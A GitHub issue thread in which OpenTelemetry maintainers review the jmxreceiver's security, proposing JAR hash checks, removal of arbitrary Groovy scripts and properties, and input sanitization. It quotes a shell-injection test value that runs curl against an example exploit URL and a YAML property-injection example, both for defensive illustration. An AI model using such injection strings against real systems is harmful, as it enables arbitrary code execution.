Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Review jmxreceiver from a security perspective #6750

Closed
Aneurysm9 opened this issue Dec 13, 2021 · 21 comments
Closed

Review jmxreceiver from a security perspective #6750

Aneurysm9 opened this issue Dec 13, 2021 · 21 comments
Assignees

Comments

@Aneurysm9
Copy link
Member

Aneurysm9 commented Dec 13, 2021

jmxreceiver allows executing Java applications and accepts the JAR to execute as well as arbitrary Groovy script.

This is potentially a security problem, especially coupled with upcoming remote configuration capabilities. We need to make sure the Collector cannot be compelled to execute arbitrary code.

See also: #6721 #6722

@jpkrohling
Copy link
Member

As discussed during the SIG meeting yesterday, the code owners are expected to present a design for making this component secure. If none is provided by 0.46.0, we'll place this component behind a feature gate, eventually removing it.

@bogdandrutu also mentioned that, for the short-term, it might make sense to add a log entry when this component is constructed, stating that this component is under security review and that it should be used with caution.

@dmitryax mentioned that he might work on this if the code owners aren't available.

@dmitryax
Copy link
Member

I meant fluentbit extension that doesn't have a code owner. This one does have a code owner. I will sync with him

@rmfitzpatrick
Copy link
Contributor

@Aneurysm9 @jpkrohling off the cuff I don't believe it is ever possible to provide 100% assurances that an exec-calling process will avoid arbitrary code execution, so the following may be moot suggestions.

The subprocess manager and the wrapped config for the JMX receiver were initially written not to knowingly accept arbitrary shell arguments:

"one": "two & exec curl http://example.com/exploit && exit 123",
. Whether this is the case by masking malicious jars or replaced jre contents is another question that cannot be reasonably enforced from the perspective of the component.

Currently this component does allow arbitrary groovy script execution, but is done so by inheriting the functionality of its upstream java-contrib library's otel.jmx.groovy.script property: https://github.com/open-telemetry/opentelemetry-java-contrib/tree/main/jmx-metrics#scriptgroovy. Would stripping this from injected properties and requiring a matched target system value be a reasonable assurance that only bundled target scripts are executed?

Recent changes from @cpheps have hardcoded the main method owning class in the receivers' java invocation:

const jmxMainClass = "io.opentelemetry.contrib.jmxmetrics.JmxMetrics"
. If there were hardcoded assurances that the uber jar specified at the configured path matched a known sha256 of a JMX Metric Gatherer release, would this be an acceptable effort? It would create an ongoing requirement to update an allowlist of known release shas, but would be much harder for a malicious jar to pretend to be an official release.

@rmfitzpatrick
Copy link
Contributor

The JAVA_TOOL_OPTIONS env var would also need to be stripped from the executing environment to avoid eased agent injection: https://docs.oracle.com/javase/8/docs/technotes/guides/troubleshoot/envvars002.html. LD_PRELOAD seems like a good candidate too.

@jpkrohling
Copy link
Member

off the cuff I don't believe it is ever possible to provide 100% assurances that an exec-calling process will avoid arbitrary code execution

True. For the record, I'm more concerned about this (and similar) component being used in an exploit where the vulnerability itself is in a different component.

Whether this is the case by masking malicious jars or replaced jre contents is another question that cannot be reasonably enforced from the perspective of the component

Agree, even though it would fall on the case I mentioned: a vulnerability in the file exporter could mean that the JAR is overridden by attackers.

If there were hardcoded assurances that the uber jar specified at the configured path matched a known sha256 of a JMX Metric Gatherer release, would this be an acceptable effort

Absolutely, this would certainly ensure that the code being executed is what we expect it to be: it's a JAR on a given path, executing a specific main class, with the whole JAR matching a known digest.

I would still have reservations about the whole process management aspect of this, but I would certainly not vote for removing this component from the contrib distribution.

codeboten pushed a commit to codeboten/opentelemetry-collector-contrib that referenced this issue Mar 31, 2022
After many discussions it seems the community is leaning towards removing the components that execute subprocesses. As such, marking the JMX receiver as deprecated.

Fixes open-telemetry#6750
@codeboten
Copy link
Contributor

As discussed in Apr 6 SIG meeting, @djaglowski will put together a proposal to move this component forward.

@djaglowski
Copy link
Member

As a first step, I have opened 282 (java-contrib) to clarify constraints on the interface between the collector and the JMX Metric Gatherer. Please tag anyone who you think may have an opinion on the issue.

@carlosalberto
Copy link
Contributor

Any news on this @djaglowski after the related Java issue was closed? Happy to help to make progress on this one.

@djaglowski
Copy link
Member

djaglowski commented Apr 19, 2022

Apologies for the delay @carlosalberto. Here is my proposal. Feedback is most welcome.


The main goal of this proposal is to identify a set of changes to the jmxreceiver and the underlying JMX Metric Gatherer ("MG") such that implementation will 1) greatly increase confidence in the security of the component, and 2) be completed within a reasonably short timeframe.

Suggested Changes

Use a hashing strategy to validate the MG

A malicious actor could replace the MG with an arbitrary executable. To ensure that this has not been done, the receiver should validate the executable. This should be done by reading the jar into memory and hashing it via SHA256, or a similarly secure hashing function. The resulting hash should be compared against a hardcode list of "known hashes". (Example implementation) If the size of the jar proves to be problematic, its contents can be "streamed" by composing a series of hashing functions in a deterministic way. (e.g. hash each 10kB, and then hash the hashes)

Pass configuration to MG via properties file

The jmxreceiver should not allow the opportunity to inject shell commands into the command that starts the MG. To do this, the MG should pass user-defined parameters via a properties file. Before running the MG, the receiver should generate and write this properties file. The path and name of the file should be automatically determined and should include a uuid so as not to be precisely predictable. The location of this file should be communicated to the MG at run time. The MG should read the file and configure itself accordingly.

Precisely control which groovy scripts the MG may be asked to run

The MG uses groovy scripts to define the mBeans that should be collected, as well as how they should be transformed into OTel metrics. This procedural mechanism is inherently less secure than a declarative one, but it can be sufficiently restricted such that the receiver may only run a precise set of "known scripts".

Currently, the receiver allows two ways to indicate which groovy script to run. The target parameter allows the user to specify one or more pre-defined scripts. These scripts are packaged within the MG so validation of the MG jar would detect any changes to them. The other parameter, groovy_script, allows the user to specify any arbitrary groovy script, which in theory contains only innocuous code. This parameter should be removed from the receiver.

Use a hashing strategy to validate additional dependencies

The receiver supports a generic mechanism for specifying additional dependencies for the MG. This mechanism is required for one specific case (Wildfly, formerly known as JBoss), but was implemented in a generic way. In this case, users must provide a JBoss Client jar, which for licensing reasons should not be distributed by this project. Fortunately, there are only 3 published releases of this jar. In order to retain support for Wildfly monitoring, a similar hashing strategy can be used to validate that the jar matches one of the three versions.

Remove ability to specify arbitrary properties

The properties setting allows users to specify arbitrary java properties that will be communicated to the MG. This introduces an unnecessary space of control to a malicious actor who gains control of the configuration. For example, a recently discovered Log4J vulnerability could be enabled or disabled via java system properties. Any necessary use cases should be supported as dedicated configuration settings. For now, this setting should be removed from the receiver.

Notable Omissions

Security of executing Java

To run the JMX Metric Gatherer, the receiver must start a JRE, which then runs the JMX Metric Gatherer. Validation of the JRE itself is not covered in the above proposal. It is not clear to me that this concern need be addressed here, or how it would be. Perspectives and solutions are welcome.

Limiting the surface area of the JMX Metric Gatherer

The above proposal does not specifically seek to restrict the interface of the MG, or substantially alter its internal workings. Rather, it attempts to guarantee that the interface can be used in a sufficiently secure manner by the collector. java-contrib#282 establishes that the MG is expected to be used independently of the collector. Therefore, restriction of its interface incurs a burden that would ideally be avoided.

Timeline

If the scope of changes is roughly in line with what is proposed above, I believe the work can be completed in May. @dehaansa will be largely available to work on this from May 2 - 20, and I can assist to an extent as well.

Longer Term

There are a couple dimensions in which I believe future development could proceed. I don't want to distract from the primary proposal too much, but briefly here are the options I see.

Replace the internal functionality of the jmxreceiver

The ideal solution for the jmxreceiver would be a purely golang implementation. Unfortunately, the requirements for such an implementation remain unclear to me. What I can say is that, as best I can tell, every single implementation of a JMX monitoring solution requires a java component. That said, I am not a Java guru, so I may have overlooked something. Perhaps someone with more precise understanding of the situation can chime in on this. In any case, I do not presently see a path forward in this direction.

Another option that should at least be entertained, is dependency upon another jmx monitoring implementation, such as nrjmx. nrjmx is an open source implementation with a golang wrapper. In many ways, it appears to be more mature than OTel's own JMX Metric Gatherer. However, it does not necessarily solve the specific security considerations addressed in this proposal, and it certainly would entail a much greater effort to adopt.

Declarative configuration

The JMX Metric Gatherer's use of groovy scripts could be replaced by a purely declarative configuration. By example, this is accomplished in the windowsperfcounterreceiver, which solves a similar problem. The effort to switch to this is non-trivial though, requiring implementation at both the golang and java levels.

Per-technology receivers

I believe future usability benefits can be realized by repackaging the jmxreceiver as a series of technology specific receivers. (eg. cassandrareceiver, tomcatreceiver, etc) This could follow the pattern used for windows performance counter receivers, where a shared package provides generic capabilities to the windowsperfcounterreceiver, while allowing technology-specific solutions such as iisreceiver to hardcode the list of desired metrics.

@codeboten
Copy link
Contributor

Thanks for the proposal @djaglowski, i think we could cover a lot of security concerns by implementing the suggested changes.

Use a hashing strategy to validate the MG

This makes sense to me, regarding the size of the jar, so long as the validation is done at start, i don't imagine we'll run into size issues.

The other parameter, groovy_script, allows the user to specify any arbitrary groovy script, which in theory contains only innocuous code. This parameter should be removed from the receiver.
Remove ability to specify arbitrary properties

I agree we should remove these

@carlosalberto
Copy link
Contributor

Thanks a lot @djaglowski - really love the detailed proposal, and sounds great to me.

This parameter should be removed from the receiver.

+1 (at least for now - once/if we have a declarative approach, we can add support for external resource files).

Validation of the JRE itself is not covered in the above proposal. It is not clear to me that this concern need be addressed here, or how it would be. Perspectives and solutions are welcome.

Also +1 to not doing it (at least now - it can be done as a follow up if/as needed).

Other than that, happy to provide review and/or coding cycles (in order to assist @dehaansa )

@carlosalberto
Copy link
Contributor

@Aneurysm9 @jpkrohling opinion on this proposal?

@jpkrohling
Copy link
Member

nrjmx is an open source implementation with a golang wrapper

If it doesn't require Java at all and won't spawn an external process, it could certainly be integrated with our collector, can't it?

Apart from that, I have a couple of questions:

  • should we recommend users to deploy the gatherer in a standalone manner whenever possible?
  • should we continue shipping the jmx receiver with contrib, or should we consider a new distribution? We briefly discussed this when the other process spawning components were in the game, but not sure what to think if the only such processor is going to be the jmx receiver.

I'm happy with the proposal, once the above points are clarified.

@djaglowski
Copy link
Member

@jpkrohling, nrjmx also executes a Java process.

should we recommend users to deploy the gatherer in a standalone manner whenever possible?

My hope with this proposal is that we can confidently recommend using the jmxreceiver. I think the main purpose of the receiver is to provide a better usability experience by not requiring the user to configure and run a second executable.

@Aneurysm9
Copy link
Member Author

I think this is a good proposal and definitely moves us in the right direction. I'm not sure if there's some inconsistency in how property handling is defined here, though. Would all of the properties written to the property file come from the collector itself, based on config values? Is the prohibition on arbitrary properties only applicable to keys? Does anything need to be done to constrain property values for allowed properties?

@djaglowski
Copy link
Member

Would all of the properties written to the property file come from the collector itself, based on config values?

That's what I had in mind, with the main idea being that this mechanism of configuration removes user configuration values from the command that starts the subprocess.

Is the prohibition on arbitrary properties only applicable to keys? Does anything need to be done to constrain property values for allowed properties?

I see your point here. It does seem there may be a way to inject additional properties if not restricted. Something like:

jmxreceiver:
  target_system: |
    jvm
    injected.key=injected.value

could in theory give us

target_system=jvm
injected.key=injected.value

My initial thought is that this shouldn't be too difficult to sanitize. Looking over the parameters, I don't see any that obviously should allow return characters. Any thoughts on this point @dehaansa?

@codeboten
Copy link
Contributor

@djaglowski just looping back here, is the right thing to move this forward to create separate issues for each suggested change and close this issue?

@djaglowski
Copy link
Member

Yes, I think so. @dehaansa, since you'll be doing the work, do you want to decompose this in a way that corresponds to the way you see this being implemented?

@dehaansa
Copy link
Contributor

dehaansa commented May 2, 2022

Yup, happy to do that.

@dehaansa
Copy link
Contributor

dehaansa commented May 2, 2022

I've created tickets for capturing the work that seems to cover the intended changes, see the references above.

I haven't captured the "longer term" concepts at this time. Declarative configured is already an issue and the other two issues weren't as concretely defined to me. If anyone has any other thoughts feel free to provide them here or on the individual issues, and we can close this issue shortly.

@djaglowski
Copy link
Member

Closing this issue in favor of the detailed tracking issues.

povilasv referenced this issue in coralogix/opentelemetry-collector-contrib Dec 19, 2022
* dependabot updates Mon Dec 12 16:56:19 UTC 2022
Bump github.com/klauspost/compress from 1.15.12 to 1.15.13
Bump github.com/prometheus/common from 0.37.0 to 0.38.0 in /processor/batchprocessor
Bump go.opentelemetry.io/contrib/instrumentation/google.golang.org/grpc/otelgrpc from 0.36.4 to 0.37.0
Bump go.opentelemetry.io/contrib/zpages from 0.36.4 to 0.37.0 in /extension/zpagesextension
Bump go.opentelemetry.io/otel from 1.11.1 to 1.11.2
Bump go.opentelemetry.io/otel/exporters/prometheus from 0.33.0 to 0.34.0 in /processor/batchprocessor
Bump go.opentelemetry.io/otel/metric from 0.33.0 to 0.34.0
Bump go.opentelemetry.io/otel/metric from 0.33.0 to 0.34.0 in /component
Bump go.opentelemetry.io/otel/metric from 0.33.0 to 0.34.0 in /processor/batchprocessor
Bump go.opentelemetry.io/otel/sdk from 1.11.1 to 1.11.2 in /extension/zpagesextension
Bump go.opentelemetry.io/otel/sdk from 1.11.1 to 1.11.2 in /processor/batchprocessor
Bump go.opentelemetry.io/otel/sdk/metric from 0.33.0 to 0.34.0
Bump go.opentelemetry.io/otel/sdk/metric from 0.33.0 to 0.34.0 in /processor/batchprocessor
Bump go.opentelemetry.io/otel/trace from 1.11.1 to 1.11.2 in /component
Bump go.opentelemetry.io/otel/trace from 1.11.1 to 1.11.2 in /extension/zpagesextension
Bump golang.org/x/tools from 0.3.0 to 0.4.0 in /internal/tools

* [chore] fix deprecated calls (#6754)

Signed-off-by: Bogdan Drutu <bogdandrutu@gmail.com>

Signed-off-by: Bogdan Drutu <bogdandrutu@gmail.com>

* [chore] fix batchprocessor (#6755)

Signed-off-by: Bogdan Drutu <bogdandrutu@gmail.com>

Signed-off-by: Bogdan Drutu <bogdandrutu@gmail.com>

* [chore] fix lint (#6756)

Signed-off-by: Bogdan Drutu <bogdandrutu@gmail.com>

Signed-off-by: Bogdan Drutu <bogdandrutu@gmail.com>

Signed-off-by: Bogdan Drutu <bogdandrutu@gmail.com>
Co-authored-by: bogdandrutu <bogdandrutu@users.noreply.github.com>
Co-authored-by: Bogdan Drutu <bogdandrutu@gmail.com>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

8 participants